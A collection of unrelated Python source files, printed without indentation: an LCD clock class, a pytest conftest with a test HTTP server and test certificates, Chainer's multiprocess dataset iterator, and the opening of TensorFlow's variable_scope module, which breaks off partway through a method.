class Clock(object):
def __init__(self, lcd: LCD, sleep_after: int = 120):
self.__lcd = lcd
self.__running = False
self.__sleep_after = sleep_after
def start(self):
if self.__running == False:
self.__running = True
self.__thread = Thread(target=self.__run)
self.__thread.daemon = True
self.__thread.start()
def stop(self):
self.__running = False
self.__thread = None
def __run(self):
async def update_time():
current_time = time.strftime('%H:%M:%S', time.localtime())
self.__lcd.overwrite_centre(0, LCDRow.BOTTOM, current_time)
sleep_counter = 0
interval = 0.3
while self.__running:
current_time = time.strftime('%H:%M:%S', time.localtime())
self.__lcd.overwrite_centre(0, LCDRow.BOTTOM, current_time)
await asyncio.sleep(interval)
sleep_counter += interval
if sleep_counter >= self.__sleep_after:
self.__lcd.turn_off()
self.stop()
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
loop.run_until_complete(update_time())
loop.close()
|
conftest.py
|
import asyncio
import json
import os
import threading
import time
import typing
import pytest
import trustme
from cryptography.hazmat.primitives.serialization import (
BestAvailableEncryption,
Encoding,
PrivateFormat,
)
from uvicorn.config import Config
from uvicorn.main import Server
from httpx import URL, AsyncioBackend
ENVIRONMENT_VARIABLES = {
"SSL_CERT_FILE",
"SSL_CERT_DIR",
"HTTP_PROXY",
"HTTPS_PROXY",
"ALL_PROXY",
"NO_PROXY",
"SSLKEYLOGFILE",
}
@pytest.fixture(scope="function", autouse=True)
def clean_environ() -> typing.Dict[str, typing.Any]:
"""Keeps os.environ clean for every test without having to mock os.environ"""
original_environ = os.environ.copy()
os.environ.clear()
os.environ.update(
{
k: v
for k, v in original_environ.items()
if k not in ENVIRONMENT_VARIABLES and k.lower() not in ENVIRONMENT_VARIABLES
}
)
yield
os.environ.clear()
os.environ.update(original_environ)
@pytest.fixture(params=[pytest.param(AsyncioBackend, marks=pytest.mark.asyncio)])
def backend(request):
backend_cls = request.param
return backend_cls()
async def app(scope, receive, send):
assert scope["type"] == "http"
if scope["path"] == "/slow_response":
await slow_response(scope, receive, send)
elif scope["path"].startswith("/status"):
await status_code(scope, receive, send)
elif scope["path"].startswith("/echo_body"):
await echo_body(scope, receive, send)
elif scope["path"].startswith("/echo_headers"):
await echo_headers(scope, receive, send)
else:
await hello_world(scope, receive, send)
async def hello_world(scope, receive, send):
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def slow_response(scope, receive, send):
await asyncio.sleep(0.1)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def status_code(scope, receive, send):
status_code = int(scope["path"].replace("/status/", ""))
await send(
{
"type": "http.response.start",
"status": status_code,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": b"Hello, world!"})
async def echo_body(scope, receive, send):
body = b""
more_body = True
while more_body:
message = await receive()
body += message.get("body", b"")
more_body = message.get("more_body", False)
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"text/plain"]],
}
)
await send({"type": "http.response.body", "body": body})
async def echo_headers(scope, receive, send):
body = {}
for name, value in scope.get("headers", []):
body[name.capitalize().decode()] = value.decode()
await send(
{
"type": "http.response.start",
"status": 200,
"headers": [[b"content-type", b"application/json"]],
}
)
await send({"type": "http.response.body", "body": json.dumps(body).encode()})
class CAWithPKEncryption(trustme.CA):
"""Implementation of trustme.CA() that can emit
private keys that are encrypted with a password.
"""
@property
def encrypted_private_key_pem(self):
return trustme.Blob(
self._private_key.private_bytes(
Encoding.PEM,
PrivateFormat.TraditionalOpenSSL,
BestAvailableEncryption(password=b"password"),
)
)
SERVER_SCOPE = "session"
@pytest.fixture(scope=SERVER_SCOPE)
def example_cert():
ca = CAWithPKEncryption()
ca.issue_cert("example.org")
return ca
@pytest.fixture(scope=SERVER_SCOPE)
def cert_pem_file(example_cert):
with example_cert.cert_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_private_key_file(example_cert):
with example_cert.private_key_pem.tempfile() as tmp:
yield tmp
@pytest.fixture(scope=SERVER_SCOPE)
def cert_encrypted_private_key_file(example_cert):
with example_cert.encrypted_private_key_pem.tempfile() as tmp:
yield tmp
class TestServer(Server):
@property
def url(self) -> URL:
protocol = "https" if self.config.is_ssl else "http"
return URL(f"{protocol}://{self.config.host}:{self.config.port}/")
def install_signal_handlers(self) -> None:
# Disable the default installation of handlers for signals such as SIGTERM,
# because it can only be done in the main thread.
pass
async def serve(self, sockets=None):
self.restart_requested = asyncio.Event()
loop = asyncio.get_event_loop()
tasks = {
loop.create_task(super().serve(sockets=sockets)),
loop.create_task(self.watch_restarts()),
}
await asyncio.wait(tasks)
async def restart(self) -> None:
# Ensure we are in an asyncio environment.
assert asyncio.get_event_loop() is not None
# This may be called from a different thread than the one the server is
# running on. For this reason, we use an event to coordinate with the server
# instead of calling shutdown()/startup() directly.
self.restart_requested.set()
self.started = False
while not self.started:
await asyncio.sleep(0.5)
async def watch_restarts(self):
while True:
if self.should_exit:
return
try:
await asyncio.wait_for(self.restart_requested.wait(), timeout=0.1)
except asyncio.TimeoutError:
continue
self.restart_requested.clear()
await self.shutdown()
await self.startup()
@pytest.fixture
def restart(backend):
"""Restart the running server from an async test function.
This fixture deals with possible differences between the environment of the
test function and that of the server.
"""
async def restart(server):
await backend.run_in_threadpool(AsyncioBackend().run, server.restart)
return restart
def serve_in_thread(server: Server):
thread = threading.Thread(target=server.run)
thread.start()
try:
while not server.started:
time.sleep(1e-3)
yield server
finally:
server.should_exit = True
thread.join()
@pytest.fixture(scope=SERVER_SCOPE)
def server():
config = Config(app=app, lifespan="off", loop="asyncio")
server = TestServer(config=config)
yield from serve_in_thread(server)
@pytest.fixture(scope=SERVER_SCOPE)
def https_server(cert_pem_file, cert_private_key_file):
config = Config(
app=app,
lifespan="off",
ssl_certfile=cert_pem_file,
ssl_keyfile=cert_private_key_file,
port=8001,
loop="asyncio",
)
server = TestServer(config=config)
yield from serve_in_thread(server)
|
multiprocess_iterator.py
|
from __future__ import division
from collections import namedtuple
import multiprocessing
from multiprocessing import sharedctypes
import signal
import sys
import threading
import warnings
import numpy
import six
from chainer.dataset import iterator
_response_time = 1.
_short_time = 0.001
_PrefetchState = namedtuple('_PrefetchState', (
'current_position', 'epoch', 'is_new_epoch',
'previous_epoch_detail', 'order'))
class MultiprocessIterator(iterator.Iterator):
"""Dataset iterator that loads examples in parallel.
This is an implementation of :class:`~chainer.dataset.Iterator` that loads
examples with worker processes. It uses the standard :mod:`multiprocessing`
module to parallelize the loading. The dataset is sent to the worker
processes in the standard way using pickle.
Note that this iterator effectively prefetches the examples for the next
batch asynchronously after the current batch is returned.
This iterator saves ``-1`` instead of ``None`` in snapshots since some
serializers do not support ``None``.
Args:
dataset (~chainer.dataset.Dataset): Dataset to iterate.
batch_size (int): Number of examples within each batch.
repeat (bool): If ``True``, it infinitely loops over the dataset.
Otherwise, it stops iteration at the end of the first epoch.
shuffle (bool): If ``True``, the order of examples is shuffled at the
beginning of each epoch. Otherwise, examples are extracted in the
order of indexes.
n_processes (int): Number of worker processes. The number of CPUs is
used by default.
n_prefetch (int): Number of prefetch batches.
shared_mem (int): The size of using shared memory per data.
If ``None``, size is adjusted automatically.
"""
_interruption_testing = False # for testing
def __init__(self, dataset, batch_size, repeat=True, shuffle=True,
n_processes=None, n_prefetch=1, shared_mem=None):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes or multiprocessing.cpu_count()
self.n_prefetch = max(n_prefetch, 1)
self.shared_mem = shared_mem
self._finalized = False
self._comm = _Communicator(self.n_prefetch)
self.reset()
self._prefetch_loop = _PrefetchLoop(
self.dataset, self.batch_size, self.repeat, self.shuffle,
self.n_processes, self.n_prefetch, self.shared_mem, self._comm,
self._interruption_testing)
# defer launching prefetch thread until creating the worker pool,
# not to leave a background thread in forked processes.
self._thread = None
def __next__(self):
measure_mode = False
if self._thread is None:
if self._prefetch_loop.measure_required():
measure_mode = True
batch, prefetch_state = self._prefetch_loop.measure()
self._thread = self._prefetch_loop.launch_thread()
del self._prefetch_loop
if not measure_mode:
batch, prefetch_state = self._comm.get()
(self.current_position, self.epoch, self.is_new_epoch,
self._previous_epoch_detail, self._order) = prefetch_state
if batch is None:
raise StopIteration
else:
return batch
next = __next__
def __del__(self):
# When `self.__del__()` is called, `self.__init__()` may not be
# finished. So some attributes may be undefined.
if not hasattr(self, '_finalized'):
# We don't know how to finalize this uninitialized object
return
if not hasattr(self, '_comm'):
self._comm = None
if not hasattr(self, '_thread'):
self._thread = None
if self._finalized:
return
self._finalized = True
if self._comm is None:
return
self._comm.terminate()
if self._thread is None:
return
while self._thread.is_alive():
self._thread.join(_response_time)
finalize = __del__
def __copy__(self):
other = MultiprocessIterator(
self.dataset, self.batch_size, self.repeat, self.shuffle,
self.n_processes, self.n_prefetch, self.shared_mem)
other.current_position = self.current_position
other.epoch = self.epoch
other.is_new_epoch = self.is_new_epoch
other._previous_epoch_detail = self._previous_epoch_detail
other._order = self._order
other._set_prefetch_state()
return other
@property
def epoch_detail(self):
return self.epoch + self.current_position / len(self.dataset)
@property
def previous_epoch_detail(self):
if self._previous_epoch_detail < 0:
return None
return self._previous_epoch_detail
def serialize(self, serializer):
self.current_position = serializer('current_position',
self.current_position)
self.epoch = serializer('epoch', self.epoch)
self.is_new_epoch = serializer('is_new_epoch', self.is_new_epoch)
try:
serializer('order', self._order)
except KeyError:
serializer('_order', self._order)
try:
self._previous_epoch_detail = serializer(
'previous_epoch_detail', self._previous_epoch_detail)
except KeyError:
# guess previous_epoch_detail for older version
self._previous_epoch_detail = self.epoch + \
(self.current_position - self.batch_size) / len(self.dataset)
if self.epoch_detail > 0:
self._previous_epoch_detail = max(
self._previous_epoch_detail, 0.)
else:
self._previous_epoch_detail = -1.
self._set_prefetch_state()
def reset(self):
if self._finalized:
raise NotImplementedError(
'Reset of finalized MultiProcessIterator is currently not '
'supported.')
self.current_position = 0
self.epoch = 0
self.is_new_epoch = False
# use -1 instead of None internally.
self._previous_epoch_detail = -1.
if self.shuffle:
self._order = numpy.random.permutation(len(self.dataset))
else:
self._order = None
self._set_prefetch_state()
def _set_prefetch_state(self):
prefetch_state = _PrefetchState(
current_position=self.current_position,
epoch=self.epoch,
is_new_epoch=self.is_new_epoch,
previous_epoch_detail=self._previous_epoch_detail,
order=self._order)
self._comm.reset(prefetch_state)
class _Communicator(object):
STATUS_CONTINUE = 0
STATUS_RESET = 1
STATUS_TERMINATE = 2
def __init__(self, n_prefetch):
self.n_prefetch = n_prefetch
self._lock = threading.Lock()
self._not_empty_cond = threading.Condition(self._lock)
self._not_full_cond = threading.Condition(self._lock)
self._batch_queue = []
self._status = _Communicator.STATUS_CONTINUE
self._reset_count = 0
@property
def is_terminated(self):
with self._lock:
return self._status == _Communicator.STATUS_TERMINATE
# called from iterator
def get(self):
with self._lock:
while len(self._batch_queue) == 0:
self._not_empty_cond.wait(_response_time)
batch, prefetch_state = self._batch_queue.pop(0)
self._not_full_cond.notify()
return batch, prefetch_state
# called from iterator
def reset(self, prefetch_state):
with self._lock:
self._status = _Communicator.STATUS_RESET
self._prefetch_state = prefetch_state
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from iterator
def terminate(self):
with self._lock:
self._status = _Communicator.STATUS_TERMINATE
self._batch_queue = []
self._not_full_cond.notify()
self._reset_count += 1
# called from thread
def check(self):
with self._lock:
status = self._status
self._status = _Communicator.STATUS_CONTINUE
prefetch_state = None
if status == _Communicator.STATUS_RESET:
prefetch_state = self._prefetch_state
return status, prefetch_state, self._reset_count
# called from thread
def put(self, batch, prefetch_state, reset_count):
with self._lock:
if len(self._batch_queue) == self.n_prefetch:
self._not_full_cond.wait()
if reset_count == self._reset_count:
self._batch_queue.append((batch, prefetch_state))
self._not_empty_cond.notify()
class _PrefetchLoop(object):
def __init__(self, dataset, batch_size, repeat, shuffle,
n_processes, n_prefetch, mem_size, comm,
_interruption_testing):
self.dataset = dataset
self.batch_size = batch_size
self.repeat = repeat
self.shuffle = shuffle
self.n_processes = n_processes
self.mem_size = mem_size
self.comm = comm
self._allocate_shared_memory()
self._pool = None
self._interruption_testing = _interruption_testing
def measure_required(self):
return self.mem_size is None
def measure(self):
status, prefetch_state, _ = self.comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
indices = self._proceed()
if indices is None: # stop iteration
batch = None
else:
batch = [self.dataset[idx] for idx in indices]
self.mem_size = max(map(_measure, batch))
self._allocate_shared_memory()
return batch, self.prefetch_state
def _allocate_shared_memory(self):
if self.measure_required():
self.mem_bulk = None
else:
self.mem_bulk = \
sharedctypes.RawArray('b', self.batch_size * self.mem_size)
def launch_thread(self):
self._pool = multiprocessing.Pool(
processes=self.n_processes,
initializer=_fetch_setup,
initargs=(self.dataset, self.mem_size, self.mem_bulk))
if self._interruption_testing:
pids = self._pool.map(_report_pid, range(self.n_processes))
print(' '.join(map(str, pids)))
sys.stdout.flush()
thread = threading.Thread(target=self._run, name='prefetch_loop')
thread.setDaemon(True)
thread.start()
return thread
def _run(self):
alive = True
try:
while alive:
alive = self._task()
finally:
self._pool.close()
self._pool.join()
def _task(self):
status, prefetch_state, reset_count = self.comm.check()
if status == _Communicator.STATUS_RESET:
self.prefetch_state = prefetch_state
elif status == _Communicator.STATUS_TERMINATE:
return False # stop loop
indices = self._proceed()
if indices is None: # stop iteration
batch = None
else:
future = self._pool.map_async(_fetch_run, enumerate(indices))
while True:
try:
data_all = future.get(_response_time)
except multiprocessing.TimeoutError:
if self.comm.is_terminated:
return False
else:
break
batch = [_unpack(data, self.mem_bulk) for data in data_all]
self.comm.put(batch, self.prefetch_state, reset_count)
return True
def _proceed(self):
n = len(self.dataset)
(pos, epoch, is_new_epoch,
previous_epoch_detail, order) = self.prefetch_state
if pos < self.batch_size and epoch > 0 and not self.repeat:
return None # stop iteration
previous_epoch_detail = epoch + pos / n
new_pos = pos + self.batch_size
if new_pos < n:
if order is None:
indices = numpy.arange(pos, new_pos)
else:
indices = order[pos:new_pos]
is_new_epoch = False
else:
new_pos = new_pos - n if self.repeat else 0
if order is None:
indices = numpy.arange(pos, n)
if self.repeat:
indices = \
numpy.concatenate((indices, numpy.arange(new_pos)))
else:
indices = order[pos:n]
if self.repeat:
order = numpy.random.permutation(n)
indices = \
numpy.concatenate((indices, order[:new_pos]))
epoch += 1
is_new_epoch = True
self.prefetch_state = _PrefetchState(
new_pos, epoch, is_new_epoch,
previous_epoch_detail, order)
return indices
# Using `parametarized` funciton (e.g. bound method) with Pool is tricky due to
# restrictions imposed by Pickle. Picklable types differ across versions.
# Just using top-level function with globals seems to be safest.
# it doesn't mean thread safety broken or global variables visible;
# notice that each process uses different address space.
# To make static linter happy, we first initialize global variables.
_fetch_dataset = None
_fetch_mem_size = None
_fetch_mem_bulk = None
def _fetch_setup(dataset, mem_size, mem_bulk):
global _fetch_dataset, _fetch_mem_size, _fetch_mem_bulk
signal.signal(signal.SIGINT, signal.SIG_IGN)
_fetch_dataset = dataset
_fetch_mem_size = mem_size
_fetch_mem_bulk = mem_bulk
def _fetch_run(inputs):
i, index = inputs
data = _fetch_dataset[index]
if _fetch_mem_bulk is not None:
offset = i * _fetch_mem_size
limit = offset + _fetch_mem_size
data = _pack(data, _fetch_mem_bulk, offset, limit)
return data
def _report_pid(_): # for testing
return multiprocessing.current_process().pid
class _PackedNdarray(object):
def __init__(self, array, mem, offset):
self.shape = array.shape
self.dtype = array.dtype
self.nbytes = array.nbytes
self.size = array.size
self.offset = offset
total = self.offset + self.nbytes
if total > len(mem):
raise ValueError(
'Shared memory size is too small. expect:{}, actual:{}'.format(
total, len(mem)))
target = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
target[...] = array.ravel()
def unpack(self, mem):
ret = numpy.frombuffer(mem, self.dtype, self.size, self.offset)
ret = ret.reshape(self.shape).copy()
return ret
def _measure(data):
expect = 0
t = type(data)
if t is tuple or t is list or t is dict:
for v in data:
if isinstance(v, numpy.ndarray):
expect += v.nbytes
return expect
def _pack(data, mem, offset, limit):
if len(mem) == 0:
return data
t = type(data)
over = False
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, numpy.ndarray):
if v.nbytes + offset > limit:
over = True
else:
v = _PackedNdarray(v, mem, offset)
offset += v.nbytes
ret[k] = v
data = ret
elif t is numpy.ndarray:
if data.nbytes + offset > limit:
over = True
else:
data = _PackedNdarray(data, mem, offset)
offset += data.nbytes
if over:
expect = _measure(data)
warnings.warn(
'Shared memory size is too small.\n' +
'Please set shared_mem option for MultiprocessIterator.\n' +
'Expect shared memory size: {} bytes.\n'.format(expect) +
'Actual shared memory size: {} bytes.'.format(limit - offset),
UserWarning)
return data
def _unpack(data, mem):
if len(mem) == 0:
return data
t = type(data)
if t is tuple or t is list:
ret = []
for v in data:
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret.append(v)
data = t(ret)
elif t is dict:
ret = {}
for k, v in six.iteritems(data):
if isinstance(v, _PackedNdarray):
v = v.unpack(mem)
ret[k] = v
data = ret
elif t is _PackedNdarray:
data = data.unpack(mem)
return data
|
variable_scope.py
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A class to store named variables and a scope operator to manage sharing."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections as collections_lib
import copy
import enum # pylint: disable=g-bad-import-order
import functools
import sys
import threading
import traceback
import six
from six import iteritems
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.python import tf2
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_shape
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import resource_variable_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.util import deprecation
from tensorflow.python.util import function_utils
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
from tensorflow.python.util.tf_export import tf_export
__all__ = [
"AUTO_REUSE", "VariableScope", "get_variable_scope", "get_variable",
"get_local_variable", "variable_scope", "variable_op_scope",
"no_regularizer", "VariableSynchronization", "VariableAggregation"
]
_api_usage_gauge = monitoring.BoolGauge(
"/tensorflow/api/resource_variables",
"Whether variable_scope.enable_resource_variables() is called.")
class _PartitionInfo(object):
"""Holds partition info used by initializer functions."""
def __init__(self, full_shape, var_offset):
"""Constructor.
Args:
full_shape: Tuple or list of `int` indicating the full combined shape of
the partitioned variables.
var_offset: Tuple or list of `int` specifying offset of this partition
with respect to the full variable for each dimension.
Raises:
TypeError: If `full_shape` or `var_offset` is not a sequence.
ValueError: If `full_shape` or `var_offset` differ in length. If
`var_offset` exceeds `full_shape` in any dimension.
"""
if not isinstance(full_shape, collections_lib.Sequence) or isinstance(
full_shape, six.string_types):
raise TypeError(
"`full_shape` must be a sequence (like tuple or list) instead of " +
type(full_shape).__name__)
if not isinstance(var_offset, collections_lib.Sequence) or isinstance(
var_offset, six.string_types):
raise TypeError(
"`var_offset` must be a sequence (like tuple or list) instead of " +
type(var_offset).__name__)
if len(var_offset) != len(full_shape):
raise ValueError(
"Expected equal length, but `var_offset` is of length {} while "
"full_shape is of length {}.".format(
len(var_offset), len(full_shape)))
for i in xrange(len(full_shape)):
offset = var_offset[i]
shape = full_shape[i]
if offset < 0 or offset >= shape:
raise ValueError(
"Expected 0 <= offset < shape but found offset={}, shape={} for "
"var_offset={}, full_shape={}".format(offset, shape, var_offset,
full_shape))
self._full_shape = full_shape
self._var_offset = var_offset
@property
def full_shape(self):
return self._full_shape
@property
def var_offset(self):
return self._var_offset
def single_offset(self, shape):
"""Returns the offset when the variable is partitioned in at most one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the offset in the dimension along which the variable is
partitioned. Returns 0 if the variable is not being partitioned.
Raises:
ValueError: Depending on self.single_slice_dim().
"""
single_slice_dim = self.single_slice_dim(shape)
# If this variable is not being partitioned at all, single_slice_dim() could
# return None.
if single_slice_dim is None:
return 0
return self.var_offset[single_slice_dim]
def single_slice_dim(self, shape):
"""Returns the slice dim when the variable is partitioned only in one dim.
Args:
shape: Tuple or list of `int` indicating the shape of one specific
variable partition.
Returns:
`int` representing the dimension that the variable is partitioned in, or
`None` if the variable doesn't seem to be partitioned at all.
Raises:
TypeError: If `shape` is not a sequence.
ValueError: If `shape` is not the same length as `self.full_shape`. If
the variable is partitioned in more than one dimension.
"""
if not isinstance(shape, collections_lib.Sequence) or isinstance(
shape, six.string_types):
raise TypeError(
"`shape` must be a sequence (like tuple or list) instead of " +
type(shape).__name__)
if len(shape) != len(self.full_shape):
raise ValueError(
"Expected equal length, but received shape={} of length {} while "
"self.full_shape={} is of length {}.".format(shape, len(shape),
self.full_shape,
len(self.full_shape)))
for i in xrange(len(shape)):
if self.var_offset[i] + shape[i] > self.full_shape[i]:
raise ValueError(
"With self.var_offset={}, a partition of shape={} would exceed "
"self.full_shape={} in dimension {}.".format(
self.var_offset, shape, self.full_shape, i))
slice_dim = None
for i in xrange(len(shape)):
if shape[i] == self.full_shape[i]:
continue
if slice_dim is not None:
raise ValueError(
"Cannot use single_slice_dim() with shape={} and "
"self.full_shape={} since slice dim could be either dimension {} "
"or {}.".format(shape, self.full_shape, i, slice_dim))
slice_dim = i
return slice_dim
class _ReuseMode(enum.Enum):
"""Mode for variable access within a variable scope."""
# Indicates that variables are to be fetched if they already exist or
# otherwise created.
AUTO_REUSE = 1
# TODO(alive): For TensorFlow 2.0, Deprecate True/False/None API in favor of
# enum values.
# REUSE_FALSE = 2
# REUSE_TRUE = 3
# TODO(apassos) remove these forwarding symbols.
VariableSynchronization = variables.VariableSynchronization # pylint: disable=invalid-name
VariableAggregation = variables.VariableAggregation # pylint: disable=invalid-name
AUTO_REUSE = _ReuseMode.AUTO_REUSE
tf_export(v1=["AUTO_REUSE"]).export_constant(__name__, "AUTO_REUSE")
AUTO_REUSE.__doc__ = """
When passed in as the value for the `reuse` flag, AUTO_REUSE indicates that
get_variable() should create the requested variable if it doesn't exist or, if
it does exist, simply return it.
"""
_DEFAULT_USE_RESOURCE = tf2.enabled()
@tf_export(v1=["enable_resource_variables"])
def enable_resource_variables():
"""Creates resource variables by default.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = True
_api_usage_gauge.get_cell().set(True)
@tf_export(v1=["resource_variables_enabled"])
def resource_variables_enabled():
"""Returns `True` if resource variables are enabled.
Resource variables are improved versions of TensorFlow variables with a
well-defined memory model. Accessing a resource variable reads its value, and
all ops which access a specific read value of the variable are guaranteed to
see the same value for that tensor. Writes which happen after a read (by
having a control or data dependency on the read) are guaranteed not to affect
the value of the read tensor, and similarly writes which happen before a read
are guaranteed to affect the value. No guarantees are made about unordered
read/write pairs.
Calling tf.enable_resource_variables() lets you opt-in to this TensorFlow 2.0
feature.
"""
global _DEFAULT_USE_RESOURCE
return _DEFAULT_USE_RESOURCE
@deprecation.deprecated(
None, "non-resource variables are not supported in the long term")
@tf_export(v1=["disable_resource_variables"])
def disable_resource_variables():
"""Opts out of resource variables.
If your code needs tf.disable_resource_variables() to be called to work
properly please file a bug.
"""
global _DEFAULT_USE_RESOURCE
_DEFAULT_USE_RESOURCE = False
_api_usage_gauge.get_cell().set(False)
class _VariableStore(object):
"""Variable store that carries a number of named Variables.
New variable names and new variables can be created; all stored
variables are initialized with the initializer passed to __init__.
Attributes:
vars: a dictionary with string names (same as passed in GetVar) as keys and
the corresponding TensorFlow Variables as values.
"""
def __init__(self):
"""Create a variable store."""
self._vars = {} # A dictionary of the stored TensorFlow variables.
self._partitioned_vars = {} # A dict of the stored PartitionedVariables.
self._store_eager_variables = False
def get_variable(self,
name,
shape=None,
dtype=dtypes.float32,
initializer=None,
regularizer=None,
reuse=None,
trainable=None,
collections=None,
caching_device=None,
partitioner=None,
validate_shape=True,
use_resource=None,
custom_getter=None,
constraint=None,
synchronization=VariableSynchronization.AUTO,
aggregation=VariableAggregation.NONE):
"""Gets an existing variable with these parameters or create a new one.
If a variable with the given name is already stored, we return the stored
variable. Otherwise, we create a new one.
Set `reuse` to `True` when you only want to reuse existing Variables.
Set `reuse` to `False` when you only want to create new Variables.
Set `reuse` to None (the default) or tf.compat.v1.AUTO_REUSE when you want
variables to be created if they don't exist or returned if they do.
If initializer is `None` (the default), the default initializer passed in
the constructor is used. If that one is `None` too, we use a new
`glorot_uniform_initializer`. If initializer is a Tensor, we use
it as a value and derive the shape from the initializer.
If a partitioner is provided, a `PartitionedVariable` is returned.
Accessing this object as a `Tensor` returns the shards concatenated along
the partition axis.
Some useful partitioners are available. See, e.g.,
`variable_axis_size_partitioner` and `min_max_variable_partitioner`.
Args:
name: The name of the new or existing variable.
shape: Shape of the new or existing variable.
dtype: Type of the new or existing variable (defaults to `DT_FLOAT`).
initializer: Initializer for the variable.
regularizer: A (Tensor -> Tensor or None) function; the result of applying
it on a newly created variable will be added to the collection
GraphKeys.REGULARIZATION_LOSSES and can be used for regularization.
reuse: a Boolean, None, or tf.AUTO_REUSE. Controls reuse or creation of
variables. When eager execution is enabled this argument is always
forced to be False.
trainable: If `True` also add the variable to the graph collection
`GraphKeys.TRAINABLE_VARIABLES` (see `tf.Variable`). `trainable`
defaults to `True`, unless `synchronization` is set to `ON_READ`, in
which case it defaults to `False`.
collections: List of graph collections keys to add the `Variable` to.
Defaults to `[GraphKeys.GLOBAL_VARIABLES]` (see `tf.Variable`).
caching_device: Optional device string or function describing where the
Variable should be cached for reading. Defaults to the Variable's
device. If not `None`, caches on another device. Typical use is to
cache on the device where the Ops using the `Variable` reside, to
deduplicate copying through `Switch` and other conditional statements.
partitioner: Optional callable that accepts a fully defined `TensorShape`
and dtype of the `Variable` to be created, and returns a list of
partitions for each axis (currently only one axis can be partitioned).
validate_shape: If False, allows the variable to be initialized with a
value of unknown shape. If True, the default, the shape of initial_value
must be known.
use_resource: If False, creates a regular Variable. If True, creates
instead an experimental ResourceVariable which has well-defined
semantics. Defaults to False (will later change to True). When eager
execution is enabled this argument is always forced to be true.
custom_getter: Callable that takes as a first argument the true getter,
and allows overwriting the internal get_variable method. The signature
of `custom_getter` should match that of this method,
but the most future-proof version will allow for changes: `def
custom_getter(getter, *args, **kwargs)`. Direct access to
all `get_variable` parameters is also allowed: `def
custom_getter(getter, name, *args, **kwargs)`. A simple identity
custom getter that simply creates variables with modified names is:
```python
def custom_getter(getter, name, *args, **kwargs): return getter(name +
'_suffix', *args, **kwargs) ```
constraint: An optional projection function to be applied to the variable
after being updated by an `Optimizer` (e.g. used to implement norm
constraints or value constraints for layer weights). The function must
take as input the unprojected Tensor representing the value of the
variable and return the Tensor for the projected value (which must have
the same shape). Constraints are not safe to use when doing asynchronous
distributed training.
synchronization: Indicates when a distributed a variable will be
aggregated. Accepted values are constants defined in the class
`tf.VariableSynchronization`. By default the synchronization is set to
`AUTO` and the current `DistributionStrategy` chooses when to
synchronize.
aggregation: Indicates how a distributed variable will be aggregated.
Accepted values are constants defined in the class
`tf.VariableAggregation`.
Returns:
The created or existing `Variable` (or `PartitionedVariable`, if a
partitioner was used).
Raises:
ValueError: when creating a new variable and shape is not declared,
when reusing a variable and specifying a conflicting shape,
or when violating reuse during variable creation.
RuntimeError: when eager execution is enabled and not called from an
EagerVariableStore.
"""
if custom_getter is not None and not callable(custom_getter):
raise ValueError("Passed a custom_getter which is not callable: %s" %
custom_getter)
with ops.init_scope():
if context.executing_eagerly():
# Variable creation and initialization takes place in `init_scope`s;
# as such, if an `init_scope` lifts us into the eager context, then we
# need to use `ResourceVariable`s.
use_resource = True
# Note that it's fine to reuse eager variables whose initialization was
# lifted from a function-building graph into the eager context (that's why
# the following clause is not wrapped in an `init_scope`); lifted variables
# are tracked by the graph's `VariableStore`.
if context.executing_eagerly():
if not self._store_eager_variables and reuse:
raise RuntimeError(
"When eager execution is enabled variable reuse is only supported"
" when an EagerVariableStore is active. See the documentation on"
" EagerVariableStore for example usage.")
if self._store_eager_variables:
reuse = AUTO_REUSE
# If a *_ref type is passed in an error would be triggered further down the
# stack. We prevent this using base_dtype to get a non-ref version of the
# type, before doing anything else. When _ref types are removed in favor of
# resources, this line can be removed.
try:
dtype = dtype.base_dtype
except AttributeError:
# .base_dtype not existing means that we will try and use the raw dtype
# which was passed in - this might be a NumPy type which is valid.
pass
# This is the main logic of get_variable. However, custom_getter
# may override this logic. So we save it as a callable and pass
# it to custom_getter.
